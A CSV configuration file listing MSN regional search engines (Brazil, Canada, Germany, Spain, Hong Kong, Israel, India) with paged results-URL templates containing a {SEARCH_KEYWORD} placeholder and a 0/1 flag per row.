"International","MSN BR","http://search.msn.com.br/results.aspx?ps=CY%3dpt-br%26ba%3d0%26co%3d50.6.200.3.2.5.3..%26&q={SEARCH_KEYWORD}&ck_sc=0&ck_af=0","0"
"International","MSN BR","http://search.msn.com.br/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN BR 2 (Next 50)","http://search.msn.com.br/results.aspx?ps=ba%3d50.0......3.%26co%3d50.6.200.3.2.5.3..%26CY%3dpt-br%26pn%3d1%26rd%3d0%26&q={SEARCH_KEYWORD}&ck_sc=0&ck_af=0","1"
"International","MSN BR 2 (Next 50)","http://search.msn.com.br/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN BR 2 (Next 50)","http://search.msn.com.br/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN BR 2 (Next 50)","http://search.msn.com.br/results.aspx?ps=ba%3d50.0......3.%26co%3d50.6.200.3.2.5.3..%26CY%3dpt-br%26pn%3d1%26rd%3d0%26&q={SEARCH_KEYWORD}&ck_sc=0&ck_af=0","0"
"International","MSN BR 2 (Next 50)","http://search.msn.com.br/results.aspx?ps=ba%3d50.0......3.%26co%3d50.6.200.3.2.5.3..%26CY%3dpt-br%26pn%3d1%26rd%3d0%26&q={SEARCH_KEYWORD}&ck_sc=0&ck_af=0","0"
"International","MSN BR 2 (Next 50)","http://search.msn.com.br/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN BR 3 (Next 50)","http://search.msn.com.br/results.aspx?ps=ba%3d100.0......6.%26co%3d50.6.200.3.2.5.3..%26CY%3dpt-br%26rd%3d0%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=0&ck_af=0","1"
"International","MSN BR 3 (Next 50)","http://search.msn.com.br/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN BR 3 (Next 50)","http://search.msn.com.br/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN BR 3 (Next 50)","http://search.msn.com.br/results.aspx?ps=ba%3d100.0......6.%26co%3d50.6.200.3.2.5.3..%26CY%3dpt-br%26rd%3d0%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=0&ck_af=0","0"
"International","MSN BR 3 (Next 50)","http://search.msn.com.br/results.aspx?ps=ba%3d100.0......6.%26co%3d50.6.200.3.2.5.3..%26CY%3dpt-br%26rd%3d0%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=0&ck_af=0","0"
"International","MSN BR 3 (Next 50)","http://search.msn.com.br/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN BR 4 (Next 50)","http://search.msn.com.br/results.aspx?ps=ba%3d150.0......6.%26co%3d50.6.200.3.2.5.3..%26CY%3dpt-br%26rd%3d0%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=0&ck_af=0","1"
"International","MSN BR 4 (Next 50)","http://search.msn.com.br/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN BR 4 (Next 50)","http://search.msn.com.br/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN BR 4 (Next 50)","http://search.msn.com.br/results.aspx?ps=ba%3d150.0......6.%26co%3d50.6.200.3.2.5.3..%26CY%3dpt-br%26rd%3d0%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=0&ck_af=0","0"
"International","MSN BR 4 (Next 50)","http://search.msn.com.br/results.aspx?ps=ba%3d150.0......6.%26co%3d50.6.200.3.2.5.3..%26CY%3dpt-br%26rd%3d0%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=0&ck_af=0","0"
"International","MSN BR 4 (Next 50)","http://search.msn.com.br/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN BR 5 (Next 50)","http://search.msn.com.br/results.aspx?ps=ba%3d200.0......6.%26co%3d50.6.200.3.2.5.3..%26CY%3dpt-br%26rd%3d0%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=0&ck_af=0","1"
"International","MSN BR 5 (Next 50)","http://search.msn.com.br/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN BR 5 (Next 50)","http://search.msn.com.br/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN BR 5 (Next 50)","http://search.msn.com.br/results.aspx?ps=ba%3d200.0......6.%26co%3d50.6.200.3.2.5.3..%26CY%3dpt-br%26rd%3d0%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=0&ck_af=0","0"
"International","MSN BR 5 (Next 50)","http://search.msn.com.br/results.aspx?ps=ba%3d200.0......6.%26co%3d50.6.200.3.2.5.3..%26CY%3dpt-br%26rd%3d0%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=0&ck_af=0","0"
"International","MSN BR 5 (Next 50)","http://search.msn.com.br/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN CA","http://search.msn.ca/results.aspx?ps=ba%3d0%26co%3d50.6.3.200.2.5.10.1.3.%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN CA","http://search.sympatico.msn.ca/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN CA","http://search.sympatico.msn.ca/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN CA","http://search.msn.ca/results.aspx?ps=ba%3d0%26co%3d50.6.3.200.2.5.10.1.3.%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN CA","http://search.msn.ca/results.aspx?ps=ba%3d0%26co%3d50.6.3.200.2.5.10.1.3.%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN CA","http://search.sympatico.msn.ca/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN CA 2 (Next 50)","http://search.msn.ca/results.aspx?ps=ba%3d50.0........%26co%3d50.6.3.200.2.5.10.1.3.%26pn%3d1%26rd%3d0%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN CA 2 (Next 50)","http://search.sympatico.msn.ca/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN CA 2 (Next 50)","http://search.sympatico.msn.ca/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN CA 2 (Next 50)","http://search.msn.ca/results.aspx?ps=ba%3d50.0........%26co%3d50.6.3.200.2.5.10.1.3.%26pn%3d1%26rd%3d0%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN CA 2 (Next 50)","http://search.msn.ca/results.aspx?ps=ba%3d50.0........%26co%3d50.6.3.200.2.5.10.1.3.%26pn%3d1%26rd%3d0%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN CA 2 (Next 50)","http://search.sympatico.msn.ca/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN CA 3 (Next 50)","http://search.msn.ca/results.aspx?ps=ba%3d100.0........%26co%3d50.6.3.200.2.5.10.1.3.%26rd%3d0%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN CA 3 (Next 50)","http://search.sympatico.msn.ca/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN CA 3 (Next 50)","http://search.sympatico.msn.ca/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN CA 3 (Next 50)","http://search.msn.ca/results.aspx?ps=ba%3d100.0........%26co%3d50.6.3.200.2.5.10.1.3.%26rd%3d0%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN CA 3 (Next 50)","http://search.msn.ca/results.aspx?ps=ba%3d100.0........%26co%3d50.6.3.200.2.5.10.1.3.%26rd%3d0%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN CA 3 (Next 50)","http://search.sympatico.msn.ca/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN CA 4 (Next 50)","http://search.msn.ca/results.aspx?ps=ba%3d150.0........%26co%3d50.6.3.200.2.5.10.1.3.%26rd%3d0%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN CA 4 (Next 50)","http://search.sympatico.msn.ca/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN CA 4 (Next 50)","http://search.sympatico.msn.ca/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN CA 4 (Next 50)","http://search.msn.ca/results.aspx?ps=ba%3d150.0........%26co%3d50.6.3.200.2.5.10.1.3.%26rd%3d0%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN CA 4 (Next 50)","http://search.msn.ca/results.aspx?ps=ba%3d150.0........%26co%3d50.6.3.200.2.5.10.1.3.%26rd%3d0%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN CA 4 (Next 50)","http://search.sympatico.msn.ca/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN CA 5 (Next 50)","http://search.msn.ca/results.aspx?ps=ba%3d200.0........%26co%3d50.6.3.200.2.5.10.1.3.%26rd%3d0%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN CA 5 (Next 50)","http://search.sympatico.msn.ca/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN CA 5 (Next 50)","http://search.sympatico.msn.ca/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN CA 5 (Next 50)","http://search.msn.ca/results.aspx?ps=ba%3d200.0........%26co%3d50.6.3.200.2.5.10.1.3.%26rd%3d0%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN CA 5 (Next 50)","http://search.msn.ca/results.aspx?ps=ba%3d200.0........%26co%3d50.6.3.200.2.5.10.1.3.%26rd%3d0%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN CA 5 (Next 50)","http://search.sympatico.msn.ca/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN DE","http://search.msn.de/results.aspx?ps=ba%3d0%26co%3d50.6.3.200.2.5.10.1.3.%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","1"
"International","MSN DE","http://search.msn.de/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN DE","http://search.msn.de/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN DE","http://search.msn.de/results.aspx?ps=ba%3d0%26co%3d50.6.3.200.2.5.10.1.3.%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN DE","http://search.msn.de/results.aspx?ps=ba%3d0%26co%3d50.6.3.200.2.5.10.1.3.%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN DE","http://search.msn.de/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN DE 2 (Next 50)","http://search.msn.de/results.aspx?ps=ba%3d49.0....3.0.1.0.%26co%3d50.6.3.200.2.5.10.1.3.%26pn%3d1%26rd%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","1"
"International","MSN DE 2 (Next 50)","http://search.msn.de/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN DE 2 (Next 50)","http://search.msn.de/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN DE 2 (Next 50)","http://search.msn.de/results.aspx?ps=ba%3d49.0....3.0.1.0.%26co%3d50.6.3.200.2.5.10.1.3.%26pn%3d1%26rd%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN DE 2 (Next 50)","http://search.msn.de/results.aspx?ps=ba%3d49.0....3.0.1.0.%26co%3d50.6.3.200.2.5.10.1.3.%26pn%3d1%26rd%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN DE 2 (Next 50)","http://search.msn.de/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN DE 3 (Next 50)","http://search.msn.de/results.aspx?ps=ba%3d(89.10)0....3.0.2.0.%26co%3d(0.50)6.3.200.2.5.10.1.3.%26rd%3d2%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","1"
"International","MSN DE 3 (Next 50)","http://search.msn.de/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN DE 3 (Next 50)","http://search.msn.de/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN DE 3 (Next 50)","http://search.msn.de/results.aspx?ps=ba%3d(89.10)0....3.0.2.0.%26co%3d(0.50)6.3.200.2.5.10.1.3.%26rd%3d2%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN DE 3 (Next 50)","http://search.msn.de/results.aspx?ps=ba%3d(89.10)0....3.0.2.0.%26co%3d(0.50)6.3.200.2.5.10.1.3.%26rd%3d2%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN DE 3 (Next 50)","http://search.msn.de/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN DE 4 (Next 50)","http://search.msn.de/results.aspx?ps=ba%3d(89.60)0....3.0.3.0.%26co%3d(0.50)6.3.200.2.5.10.1.3.%26rd%3d2%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","1"
"International","MSN DE 4 (Next 50)","http://search.msn.de/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN DE 4 (Next 50)","http://search.msn.de/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN DE 4 (Next 50)","http://search.msn.de/results.aspx?ps=ba%3d(89.60)0....3.0.3.0.%26co%3d(0.50)6.3.200.2.5.10.1.3.%26rd%3d2%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN DE 4 (Next 50)","http://search.msn.de/results.aspx?ps=ba%3d(89.60)0....3.0.3.0.%26co%3d(0.50)6.3.200.2.5.10.1.3.%26rd%3d2%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN DE 4 (Next 50)","http://search.msn.de/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN DE 5 (Next 50)","http://search.msn.de/results.aspx?ps=ba%3d(89.110)0....3.0.3.0.%26co%3d(0.50)6.3.200.2.5.10.1.3.%26rd%3d2%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","1"
"International","MSN DE 5 (Next 50)","http://search.msn.de/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN DE 5 (Next 50)","http://search.msn.de/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN DE 5 (Next 50)","http://search.msn.de/results.aspx?ps=ba%3d(89.110)0....3.0.3.0.%26co%3d(0.50)6.3.200.2.5.10.1.3.%26rd%3d2%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN DE 5 (Next 50)","http://search.msn.de/results.aspx?ps=ba%3d(89.110)0....3.0.3.0.%26co%3d(0.50)6.3.200.2.5.10.1.3.%26rd%3d2%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN DE 5 (Next 50)","http://search.msn.de/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN ES","http://search.msn.es/results.aspx?ps=ba%3d0%26co%3d50.6.3.200.2.5.10.3.%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN ES","http://search.msn.es/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN ES","http://search.msn.es/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN ES","http://search.msn.es/results.aspx?ps=ba%3d0%26co%3d50.6.3.200.2.5.10.3.%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN ES","http://search.msn.es/results.aspx?ps=ba%3d0%26co%3d50.6.3.200.2.5.10.3.%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN ES","http://search.msn.es/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN ES 2 (Next 50)","http://search.msn.es/results.aspx?ps=ba%3d48.0....3.0..%26co%3d50.6.3.200.2.5.10.3.%26pn%3d1%26rd%3d1%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN ES 2 (Next 50)","http://search.msn.es/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN ES 2 (Next 50)","http://search.msn.es/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN ES 2 (Next 50)","http://search.msn.es/results.aspx?ps=ba%3d48.0....3.0..%26co%3d50.6.3.200.2.5.10.3.%26pn%3d1%26rd%3d1%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN ES 2 (Next 50)","http://search.msn.es/results.aspx?ps=ba%3d48.0....3.0..%26co%3d50.6.3.200.2.5.10.3.%26pn%3d1%26rd%3d1%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN ES 2 (Next 50)","http://search.msn.es/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN ES 3 (Next 50)","http://search.msn.es/results.aspx?ps=ba%3d98.0....3.0..%26co%3d50.6.3.200.2.5.10.3.%26rd%3d1%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN ES 3 (Next 50)","http://search.msn.es/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN ES 3 (Next 50)","http://search.msn.es/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN ES 3 (Next 50)","http://search.msn.es/results.aspx?ps=ba%3d98.0....3.0..%26co%3d50.6.3.200.2.5.10.3.%26rd%3d1%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN ES 3 (Next 50)","http://search.msn.es/results.aspx?ps=ba%3d98.0....3.0..%26co%3d50.6.3.200.2.5.10.3.%26rd%3d1%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN ES 3 (Next 50)","http://search.msn.es/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN ES 4 (Next 50)","http://search.msn.es/results.aspx?ps=ba%3d148.0....3.0..%26co%3d50.6.3.200.2.5.10.3.%26rd%3d1%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN ES 4 (Next 50)","http://search.msn.es/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN ES 4 (Next 50)","http://search.msn.es/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN ES 4 (Next 50)","http://search.msn.es/results.aspx?ps=ba%3d148.0....3.0..%26co%3d50.6.3.200.2.5.10.3.%26rd%3d1%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN ES 4 (Next 50)","http://search.msn.es/results.aspx?ps=ba%3d148.0....3.0..%26co%3d50.6.3.200.2.5.10.3.%26rd%3d1%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN ES 4 (Next 50)","http://search.msn.es/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN ES 5 (Next 50)","http://search.msn.es/results.aspx?ps=ba%3d(162.36)0....3.0..%26co%3d(0.50)6.3.200.2.5.10.3.%26rd%3d1%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN ES 5 (Next 50)","http://search.msn.es/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN ES 5 (Next 50)","http://search.msn.es/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN ES 5 (Next 50)","http://search.msn.es/results.aspx?ps=ba%3d(162.36)0....3.0..%26co%3d(0.50)6.3.200.2.5.10.3.%26rd%3d1%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN ES 5 (Next 50)","http://search.msn.es/results.aspx?ps=ba%3d(162.36)0....3.0..%26co%3d(0.50)6.3.200.2.5.10.3.%26rd%3d1%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN ES 5 (Next 50)","http://search.msn.es/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN HK","http://search.msn.com.hk/results.aspx?ps=CY%3dzh-hk%26ba%3d0%26co%3d50.6.200.3.2.5.3.%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN HK","http://search.msn.com.hk/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN HK","http://search.msn.com.hk/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN HK","http://search.msn.com.hk/results.aspx?ps=CY%3dzh-hk%26ba%3d0%26co%3d50.6.200.3.2.5.3.%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN HK","http://search.msn.com.hk/results.aspx?ps=CY%3dzh-hk%26ba%3d0%26co%3d50.6.200.3.2.5.3.%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN HK","http://search.msn.com.hk/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN HK 2 (Next 50)","http://search.msn.com.hk/results.aspx?ps=ba%3d(43.7)0....1.0.%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dzh-hk%26pn%3d1%26rd%3d1%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN HK 2 (Next 50)","http://search.msn.com.hk/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN HK 2 (Next 50)","http://search.msn.com.hk/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN HK 2 (Next 50)","http://search.msn.com.hk/results.aspx?ps=ba%3d(43.7)0....1.0.%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dzh-hk%26pn%3d1%26rd%3d1%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN HK 2 (Next 50)","http://search.msn.com.hk/results.aspx?ps=ba%3d(43.7)0....1.0.%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dzh-hk%26pn%3d1%26rd%3d1%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN HK 2 (Next 50)","http://search.msn.com.hk/results.aspx?q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN HK 3 (Next 50)","http://search.msn.com.hk/results.aspx?ps=ba%3d(43.57)0....1.0.%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dzh-hk%26rd%3d1%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN HK 3 (Next 50)","http://search.msn.com.hk/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN HK 3 (Next 50)","http://search.msn.com.hk/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN HK 3 (Next 50)","http://search.msn.com.hk/results.aspx?ps=ba%3d(43.57)0....1.0.%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dzh-hk%26rd%3d1%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN HK 3 (Next 50)","http://search.msn.com.hk/results.aspx?ps=ba%3d(43.57)0....1.0.%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dzh-hk%26rd%3d1%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN HK 3 (Next 50)","http://search.msn.com.hk/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN HK 4 (Next 50)","http://search.msn.com.hk/results.aspx?ps=ba%3d(43.107)0....1.0.%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dzh-hk%26rd%3d1%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN HK 4 (Next 50)","http://search.msn.com.hk/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN HK 4 (Next 50)","http://search.msn.com.hk/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN HK 4 (Next 50)","http://search.msn.com.hk/results.aspx?ps=ba%3d(43.107)0....1.0.%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dzh-hk%26rd%3d1%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN HK 4 (Next 50)","http://search.msn.com.hk/results.aspx?ps=ba%3d(43.107)0....1.0.%26co%3d(0.50)6.200.3.2.5.3.%26CY%3dzh-hk%26rd%3d1%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN HK 4 (Next 50)","http://search.msn.com.hk/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN HK 5 (Next 50)","http://search.msn.com.hk/results.aspx?ps=ba%3d(43.123.34)0....1.0.%26co%3d(0..50)6.200.3.2.5.3.%26CY%3dzh-hk%26rd%3d1%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN HK 5 (Next 50)","http://search.msn.com.hk/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN HK 5 (Next 50)","http://search.msn.com.hk/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN HK 5 (Next 50)","http://search.msn.com.hk/results.aspx?ps=ba%3d(43.123.34)0....1.0.%26co%3d(0..50)6.200.3.2.5.3.%26CY%3dzh-hk%26rd%3d1%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN HK 5 (Next 50)","http://search.msn.com.hk/results.aspx?ps=ba%3d(43.123.34)0....1.0.%26co%3d(0..50)6.200.3.2.5.3.%26CY%3dzh-hk%26rd%3d1%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","0"
"International","MSN HK 5 (Next 50)","http://search.msn.com.hk/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN IL","http://search.msn.co.il/Search.aspx?q={SEARCH_KEYWORD}&p=1","1"
"International","MSN IL","http://search.msn.co.il/Search.aspx?q={SEARCH_KEYWORD}&p=1","0"
"International","MSN IL","http://search.msn.co.il/Search.aspx?q={SEARCH_KEYWORD}&p=1","0"
"International","MSN IL 2 (Next 15)","http://search.msn.co.il/Search.aspx?q={SEARCH_KEYWORD}&p=2","1"
"International","MSN IL 2 (Next 15)","http://search.msn.co.il/Search.aspx?q={SEARCH_KEYWORD}&p=2","0"
"International","MSN IL 2 (Next 15)","http://search.msn.co.il/Search.aspx?q={SEARCH_KEYWORD}&p=2","0"
"International","MSN IL 3 (Next 15)","http://search.msn.co.il/Search.aspx?q={SEARCH_KEYWORD}&p=3","1"
"International","MSN IL 3 (Next 15)","http://search.msn.co.il/Search.aspx?q={SEARCH_KEYWORD}&p=3","0"
"International","MSN IL 3 (Next 15)","http://search.msn.co.il/Search.aspx?q={SEARCH_KEYWORD}&p=3","0"
"International","MSN IL 4 (Next 15)","http://search.msn.co.il/Search.aspx?q={SEARCH_KEYWORD}&p=4","1"
"International","MSN IL 4 (Next 15)","http://search.msn.co.il/Search.aspx?q={SEARCH_KEYWORD}&p=4","0"
"International","MSN IL 4 (Next 15)","http://search.msn.co.il/Search.aspx?q={SEARCH_KEYWORD}&p=4","0"
"International","MSN IL 5 (Next 15)","http://search.msn.co.il/Search.aspx?q={SEARCH_KEYWORD}&p=5","0"
"International","MSN IL 5 (Next 15)","http://search.msn.co.il/Search.aspx?q={SEARCH_KEYWORD}&p=5","1"
"International","MSN IL 5 (Next 15)","http://search.msn.co.il/Search.aspx?q={SEARCH_KEYWORD}&p=5","0"
"International","MSN IN","http://search.msn.co.in/results.aspx?ps=ba%3d0%26co%3d50.6.3.200.2.5.3.%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=0","1"
"International","MSN IN","http://search.msn.com.hk/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
